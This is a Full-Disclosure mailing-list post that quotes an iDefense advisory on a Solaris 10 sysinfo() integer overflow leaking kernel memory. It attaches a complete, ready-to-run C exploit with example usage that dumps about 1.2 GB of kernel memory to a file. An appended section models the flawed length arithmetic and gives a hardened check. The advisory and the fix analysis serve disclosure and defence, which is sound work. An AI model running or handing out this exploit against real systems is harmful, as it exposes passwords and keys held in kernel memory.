Re: Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
Exploit has been attached, as there were problems with site hosting over the weekend.
--- Micheal Turner <wh1t3h4t3@xxxxxxxxxxx> wrote:
>
> http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c
>
> --- labs-no-reply <labs-no-reply@xxxxxxxxxxxx> wrote:
>
> > Sun Microsystems Solaris sysinfo() Kernel Memory
> > Disclosure Vulnerability
> >
> > iDefense Security Advisory 07.20.06
> > http://www.idefense.com/application/poi/display?type=vulnerabilities
> > July 20, 2006
> >
> > I. BACKGROUND
> >
> > Solaris is a UNIX operating system developed by Sun Microsystems.
> >
> > II. DESCRIPTION
> >
> > Local exploitation of an integer overflow vulnerability in Sun
> > Microsystems Inc. Solaris allows attackers to read kernel memory from a
> > non-privileged userspace process.
> >
> > The vulnerability specifically exists due to an integer overflow in
> > /usr/src/uts/common/syscall/systeminfo.c. The vulnerable code is as
> > follows:
> >
> >     if (kstr != NULL) {
> >         if ((strcnt = strlen(kstr)) >= count) {
> >             getcnt = count - 1;
> >             if (subyte(buf + count - 1, 0) < 0)
> >                 return (set_errno(EFAULT));
> >         } else
> >             getcnt = strcnt + 1;
> >         if (copyout(kstr, buf, getcnt))
> >             return (set_errno(EFAULT));
> >         return (strcnt + 1);
> >     }
> >
> > If the variable count (which is a value provided by the user invoking
> > the function) is 0, the function will call the copyout function with a
> > length argument of -1. Because copyout interprets the length argument as
> > an unsigned integer, a large amount of data will be copied out to
> > userspace, well beyond the boundaries that are intended.
> >
> > III. ANALYSIS
> >
> > Successful exploitation of this vulnerability allows attackers to read
> > sensitive kernel memory. This can lead to the compromise of passwords or
> > keys. It can also aid an attacker in gathering information for
> > exploitation of other kernel level vulnerabilities.
> >
> > IV. DETECTION
> >
> > iDefense has confirmed that Solaris 10 is vulnerable. Earlier versions
> > of Solaris are not affected.
> >
> > V. WORKAROUND
> >
> > iDefense is currently unaware of any workaround for this issue.
> >
> > VI. VENDOR RESPONSE
> >
> > Sun Alert ID 102343 addresses this issue and is available at:
> >
> > http://sunsolve.sun.com/search/document.do?assetkey=1-26-102343-1
> >
> > VII. CVE INFORMATION
> >
> > A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
> > been assigned yet.
> >
> > VIII. DISCLOSURE TIMELINE
> >
> > 12/15/2005 Initial vendor notification
> > 12/15/2005 Initial vendor response
> > 07/20/2006 Coordinated public disclosure
> >
> > IX. CREDIT
> >
> > The discoverer of this vulnerability wishes to remain anonymous.
> >
> > Get paid for vulnerability research
> > http://www.idefense.com/poi/teams/vcp.jsp
> >
> > Free tools, research and upcoming events
> > http://labs.idefense.com
> >
> > X. LEGAL NOTICES
> >
> > Copyright © 2006 iDefense, Inc.
> >
> > Permission is granted for the redistribution of this alert
> > electronically. It may not be edited in any way without the express
> > written consent of iDEFENSE. If you wish to reprint the whole or any
> > part of this alert in any other medium other than electronically, please
> > email customerservice@xxxxxxxxxxxx for permission.
> >
> > Disclaimer: The information in the advisory is believed to be accurate
> > at the time of publishing based on currently available information. Use
> > of the information constitutes acceptance for use in an AS IS condition.
> > There are no warranties with regard to this information. Neither the
> > author nor the publisher accepts any liability for any direct, indirect,
> > or consequential loss or damage arising from use of, or reliance on,
> > this information.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
 * ===================================================================
 * Local exploitation of an integer overflow vulnerability in Sun
 * Microsystems Inc. Solaris allows attackers to read kernel memory from a
 * non-privileged userspace process. The vulnerability specifically exists
 * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
 *
 * Example Use.
 * $ uname -a
 * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
 * $ ./prdelka-vs-SUN-sysinfo kbuf
 * [ Solaris <= 10 sysinfo() kernel memory information leak
 * [ Wrote 1294967293 bytes to kbuf
 * $ ls -al kbuf
 * -rwx------ 1 user other 1.2G Jul 21 23:56 kbuf
 *
 * -prdelka
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define bufsize 1294967293

int main(int argc, char *argv[])
{
    int fd;
    ssize_t out;
    char *output_buffer;

    if (argc < 2) {
        printf("[ Use with <filepath>\n");
        exit(1);
    }
    printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n");

    output_buffer = malloc(bufsize);
    if (output_buffer == NULL) {
        perror("malloc");
        exit(1);
    }
    memset(output_buffer, 0, bufsize);

    /* count == 0: the kernel computes getcnt = count - 1 = -1, which
     * copyout() takes as a huge unsigned length (see the advisory above) */
    sysinfo(SI_SYSNAME, output_buffer, 0);

    /* open() returns -1 on failure; descriptor 0 is valid, so test >= 0 */
    fd = open(argv[1], O_RDWR | O_CREAT, 0700);
    if (fd >= 0) {
        out = write(fd, output_buffer, bufsize);
        printf("[ Wrote %ld bytes to %s\n", (long)out, argv[1]);
        close(fd);
    }
    exit(0);
}
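The length arithmetic the advisory quotes, modelled in user space as an added example (this is neither Sun's code nor the author's exploit): the vulnerable computation beside a hardened variant that rejects a non-positive count before subtracting. The types of count, strcnt and getcnt, the size_t length parameter of copyout(), and the kernel string are assumptions or constructed stand-ins.

```c
#include <errno.h>
#include <stdint.h>
#include <string.h>

/* Constructed stand-in for the kernel string sysinfo(SI_SYSNAME) returns. */
static const char kstr[] = "SunOS";

/*
 * Length arithmetic as quoted in the advisory, with assumed types: count is
 * the caller-supplied long, strcnt/getcnt are int, and copyout() takes its
 * length as size_t. Returns the length copyout() would be handed.
 */
size_t vulnerable_copy_len(long count)
{
    int strcnt, getcnt;

    if ((strcnt = (int)strlen(kstr)) >= count)
        getcnt = count - 1;        /* count == 0 leaves getcnt == -1 */
    else
        getcnt = strcnt + 1;
    return (size_t)getcnt;         /* -1 widens to SIZE_MAX: the whole leak */
}

/*
 * Hardened variant (added here, not Sun's fix): a non-positive count is
 * rejected before any subtraction, so the length can never wrap. Returns the
 * copy length, or -EINVAL on a bad count, so callers can report it the way
 * the advisory's code reports EFAULT.
 */
long hardened_copy_len(long count)
{
    size_t strcnt = strlen(kstr);

    if (count <= 0)
        return -EINVAL;
    if (strcnt >= (size_t)count)
        return count - 1;          /* truncate, leaving room for the NUL */
    return (long)strcnt + 1;
}
```

A unit test that asserts vulnerable_copy_len(0) == SIZE_MAX is the regression check to keep alongside a fix of this shape, since the bug only shows at that single boundary value.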